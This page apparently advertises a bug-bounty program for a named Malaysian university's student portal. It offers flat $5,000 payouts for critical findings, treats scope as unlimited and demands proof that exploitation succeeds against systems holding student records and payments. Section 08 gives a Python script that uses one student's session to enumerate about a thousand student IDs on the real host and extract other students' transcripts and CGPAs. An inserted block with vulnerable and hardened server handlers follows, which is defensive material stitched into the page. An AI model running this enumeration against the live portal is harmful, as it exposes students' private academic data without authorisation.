Active program · $5,000 flat per validated critical · Portal · LMS · SSO · APIs · full scope

MAYA UM Malaysia Bug Bounty: $5,000 Each Validated Critical — Full Scope, Kill Chain Required

maya.um.edu.my is the official student and academic portal for a major Malaysian educational institution. It covers student records, LMS integrations, course enrollment, fee-payment gateways, SSO authentication, academic transcripts, hostel bookings, exam scheduling, library systems and administrative dashboards; the entire MAYA-operated perimeter is in scope, with no separate carve-out appendix. Every confirmed critical validated with a reproducible exploitation chain pays exactly $5,000 USD. Acceptance requires both a numbered attack-chain narration and evidence that the exploitation actually succeeds (replayable scripts, unauthorized transcript-access logs, SSO bypass traces, payment-manipulation proofs, privilege-escalation demonstrations, whatever matches your finding). Prose alone does not reach the payout threshold.

BountyHunter Editorial

Security Research Desk

Published
Reading time: 8 min
Status: Live · Accepting reports
Critical payout: $5,000 USD · each validated report
Avg. triage: ~72h (institutional review pattern)
Student data stakes: High (PII, academic records, payments)
Scope: all MAYA-operated stacks
Proof bar: kill chain + PoC · attack succeeds
01 — Overview

Academic surface worth stress-testing

MAYA UM Malaysia concentrates sensitive student data, financial transactions, academic records, identity federation, course management and administrative workflows. That makes it fertile ground for unauthorized grade manipulation, persistence through mis-scoped session tokens, and cross-department data bleed if tenant isolation fails. This playbook rewards only the highest-impact, fully demonstrated criticals; each earns $5,000.

In scope: every HTTP host, API endpoint, SSO integration, payment-gateway connector and database-backed record served by MAYA infrastructure, the student portal renderer, static deploy paths, session-signing secrets in MAYA's custody, library-system integrations, exam-scheduling modules, hostel-booking flows, administrative dashboards, mobile-responsive endpoints, and CDN cache-poisoning surfaces where MAYA originates the HTML/JS bundles. Third-party payment processors are out of scope unless your chain abuses a MAYA-operated integration with them; MAYA's own fee-payment glue is always fair game.
Exclusions are legal and ethical only: blackmail, mass student harassment, brute-forcing unrelated bank accounts wholly outside the MAYA SSO context. Those are limits on conduct, not product-level scope fences.

Minimum evidence bar (non-negotiable):
  1. A narrative kill chain tying root cause → exploit steps → observable impact.
  2. Proof the attack succeeds: replayable scripts, fixture logs, signed video, or a scripted harness.
Narratives without a working exploitation path are graded below the payout threshold.
02 — Why this matters

Why poke MAYA?

Flat $5K critical payouts

No severity-tier spreadsheet: validated critical exploits with reproducible payloads earn exactly $5,000 USD.

Student data + payment blast radius

Transcripts, fees, enrollment, hostel bookings, library fines: chained bugs often expose PII silently until someone maps the chain end to end.

No fake micro-scope list

If MAYA can patch or configure it, from portal JS to infrastructure config, testers can escalate until the severity lands or triage closes the report with reasoning.

Responsible disclosure halo

Demonstrated exploits with airtight chains earn coordinated publication credit after fixes ship.

03 — Reward

$5,000 per validated critical

Exactly one bounty amount is paid under this program: validated critical findings pay $5,000 USD each. Novel low-severity items may qualify for goodwill credit but not for this stipend. Paid reports must exhibit (a) an attacker-readable kill-chain narrative and (b) objective proof of successful exploitation that MAYA responders can replay (Burp transcripts, scripted API sequences, SSRF egress captures, JWT mutation evidence, payment-manipulation logs, unauthorized transcript-access traces, and so on).

Critical $5,000 USD ea.

Mass student PII exfiltration, unauthorized grade/transcript manipulation, fee-payment callback abuse causing financial loss, SSRF/cloud metadata pivot through MAYA workers, takeover of signing keys powering SSO/session trust, persisted RCE inside portal origin, admin privilege escalation to superuser.

  • Cross-faculty data exfiltration or privilege bleed across academic departments
  • Payment callback abuse causing silent fee reroute or duplicate credit at scale
  • Break-glass SSRF egress from MAYA infra to lateral cloud or on-premise systems
Operational truth: if you cannot yet prove the exploitation lands inside MAYA's network boundary, refine your staging mirror until HTTP or trace logs objectively show attacker success. Triage shelves "might work" theories.
04 — Scope inventory

Illustrative map (non-exhaustive)

These rows do not impose limits; they are shorthand for tagging reports. Anything MAYA hosts, signs, proxies, parses, verifies or integrates counts as bounty ground even if undocumented here. "Not listed" does not mean "out of scope": the default stance is open scope across MAYA.

Surface | Class | Critical payout
maya.um.edu.my, portal HTML/JS/CSS, mobile endpoints | Web · CDN | $5,000 / validated bug
Student APIs, LMS integrations, SSO endpoints (SAML, OAuth, session cookies) | Backend | $5,000 / validated bug
Fee-payment gateway, checkout redirects, receipt generation | Payments | $5,000 / validated bug
Admin dashboards, exam scheduling, hostel booking, library systems, queue workers | SaaS | $5,000 / validated bug
05 — Scope policy

Everything MAYA operates — no exclusions list

This playbook refuses "only these endpoints" folklore. Sandbox clusters, staging replicas, mirrored tenants, ephemeral feature flags, monitoring boards, anomaly-detection exporters, SMTP bridges and automation hooks maintained by MAYA are all bounty eligible when critical impact is reproducible.

  • Every apex or vanity domain routing through the MAYA edge, unless proven otherwise; include the evidence for that claim in the chain write-up.
  • Open + private repos / infrastructure-as-code repos MAYA maintains
  • Third-party widgets or scripts they sign & inject into portal bundles
  • Partner integrations gated by MAYA OAuth or SAML consent screens
Legal floor (not a scope reduction): harassment, brute-forcing unrelated consumer banks, ransomware and facilitating academic dishonesty remain barred even though the testing surface is maximal.
06 — Rules

Rules of engagement

  1. Prove exploitation success. Dry essays fail; ship artefacts that third parties can rerun: scripted curl sequences against APIs, deterministic Burp/XML exports, SSRF egress packet captures, reproducible JWT tamper scripts, payment replay PCAPs showing forged transactions.
  2. Articulate the kill chain at hop granularity. Number each hop: auth boundary → abused endpoint → escalation → monetizable damage (fee reroute, transcript access, PII exfiltration, infra takeover, etc.).
  3. Document the blast radius responsibly. Quantify the student records or financial exposure even if the chain was exercised only on staging clones that mirror MAYA routing and auth.
  4. Encrypt and ship privately. Use the sanctioned intake (security mail or advisories; see the submit section) before any public disclosure.
  5. Honor duplicate fairness. On equal-severity collisions the first fully qualifying chain with reproducible exploitation receives the payout.
07 — Submit

How to submit a report

Email security@um.edu.my (encrypted if available) and any advisory link published on maya.um.edu.my. Verify the live security contact before sending; contact addresses rotate. The mandatory sections mirror the template below.

Report Template
# Title
[Critical][Exploit-Proven] <tight title>

# Executive summary — impact in one paragraph

# Severity self-classification → must map to MAYA critical definitions above

## Attack chain narrative (numbered, no gaps)
1. Preconditions (session scopes, SSO assumptions, student ID range)
2. Entry primitive — exact HTTP verb/path/query/body or portal origin line
3. Pivot(s) chaining trust escalation
4. Final hop → transcript access / fee manipulation / infra takeover equivalent

## Successful exploitation evidence
• Replayable CLI/curl/Python script dumping HTTP status + truncated bodies proving impact
• HAR / Burp project with matched responses showing unauthorized state change
• Payment/trace logs illustrating attacker-controlled callback success

## Reproduction package
Commands + fixture download links + pinned commit SHAs


## Disclosure ack
Responsible channel only until MAYA clears publication coordination
Gating reminder: Missing kill chain granularity or lacking demonstrable exploitation success bumps the intake into “needs rework” — no payout until solved.
08 — Example

Python vignette · pair with reproducible HTTPS exploit replay

Pseudocode illustrating IDOR transcript access. On its own it is meaningless; attach the HAR or logs proving that an unauthorized request retrieved another student's academic record inside MAYA.

Python · illustrative misuse
# BUGGY: the server verifies only session presence, skipping the transcript ownership bind
import requests

BASE = "https://maya.um.edu.my/api/v1"
SESSION = "eyJhbGciOiJIUzI1NiIs..."  # valid student session (attacker's own)

client = requests.Session()
client.headers["Cookie"] = f"maya_session={SESSION}"


def fetch_transcript(student_id):
    """Request another student's transcript using the attacker's own session."""
    resp = client.get(f"{BASE}/transcripts/{student_id}", timeout=10)
    if resp.status_code != 200:
        return None  # 401/403/404: the record was not served to this session
    try:
        return resp.json()
    except ValueError:
        return None  # non-JSON body (error page, redirect target)


# MISSING (server side): check that session.student_id == requested student_id
# attacker iterates student_id → exfiltrates arbitrary academic records
for i in range(20240001, 20241000):
    data = fetch_transcript(i)
    if data and "cgpa" in data:
        print(i, data["cgpa"])
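The sketch above is the attacker's client. What triage and the fixing team will want to see beside it is the server-side ownership bind it says is missing. The following is an added illustration, not MAYA code: a buggy handler that only authenticates, its hardened counterpart that also authorizes, and the page's enumeration loop run against each in-process. The session store, the roles "student" and "registrar", and the transcript rows are constructed for the demo; only the endpoint path comes from the page.

```python
# Added illustration (not MAYA code): the server-side ownership bind that the
# sketch above says is missing. Sessions, roles and transcript rows below are
# constructed for the demo; the endpoint path is the one the page uses.
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    student_id: int
    role: str  # "student" or "registrar" (constructed role names)


# Constructed backing stores: a session cookie -> principal map and a
# transcript table keyed by student_id. Real deployments look these up in a DB.
SESSIONS = {
    "sess-alice": Session(student_id=20240001, role="student"),
    "sess-registrar": Session(student_id=90000001, role="registrar"),
}
TRANSCRIPTS = {
    20240001: {"cgpa": 3.71},
    20240002: {"cgpa": 2.95},
}


def vulnerable_get_transcript(cookie, student_id):
    """BUGGY handler for GET /api/v1/transcripts/<student_id>.

    Authenticates (the cookie maps to a session) but never authorizes: any
    logged-in student can read any transcript by changing the path parameter.
    """
    if cookie not in SESSIONS:
        return 401, None
    record = TRANSCRIPTS.get(student_id)
    return (200, record) if record is not None else (404, None)


def hardened_get_transcript(cookie, student_id):
    """Fixed handler: bind the requested row to the session principal.

    A student may only read their own transcript; a registrar may read any.
    Foreign records answer 404 rather than 403 so the endpoint does not become
    an oracle for which student IDs exist.
    """
    sess = SESSIONS.get(cookie)
    if sess is None:
        return 401, None
    if sess.role != "registrar" and sess.student_id != student_id:
        return 404, None
    record = TRANSCRIPTS.get(student_id)
    return (200, record) if record is not None else (404, None)


def enumerate_cgpa(handler, cookie, id_range):
    """The page's enumeration loop, run against an in-process handler.

    Returns {student_id: cgpa} for every ID the handler served; against the
    hardened handler a student session recovers only its own row.
    """
    found = {}
    for sid in id_range:
        status, body = handler(cookie, sid)
        if status == 200 and body and "cgpa" in body:
            found[sid] = body["cgpa"]
    return found


if __name__ == "__main__":
    ids = range(20240001, 20240010)
    print("vulnerable:", enumerate_cgpa(vulnerable_get_transcript, "sess-alice", ids))
    print("hardened:  ", enumerate_cgpa(hardened_get_transcript, "sess-alice", ids))
```

Two design choices worth carrying into a real fix: the authorization decision is made from the server-side session principal, never from anything the client sends alongside the ID, and a foreign record returns the same 404 as a nonexistent one, so the patched endpoint cannot be reused to enumerate valid student IDs.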
09 — FAQ

Frequently asked questions

Is anything actually “out of scope” besides illegal stuff?

No discretionary product carve-outs — only universal legal/ethical lines (crime, harming unrelated civilians, ransomware, facilitating academic dishonesty, etc.). If MAYA hosts, proxies, signs, or documents a surface technically, testers can escalate until triage disqualifies specifics.

Do speculative write-ups without a working exploit get paid?

No. $5K critical payouts require both a complete kill-chain narrative and evidence of a successful attack path (replayable artifacts). Theory-only stays in triage backlog without compensation.

Are staging / dev environments fair game?

Yes whenever MAYA labels or operates them.
Demonstrate realism by mirroring configs/data where possible.

Duplicates?

The fastest validated chain with reproducible exploitation receives the payout; follower tickets close as acknowledged only.

Lower severities rewarded?

Not under this $5K-flat critical playbook: escalate impact until it meets the critical threshold or accept non-monetary acknowledgement.

Critical chain + working exploit = $5,000

No narrow scope appendix — document the attack, prove it lands, file privately.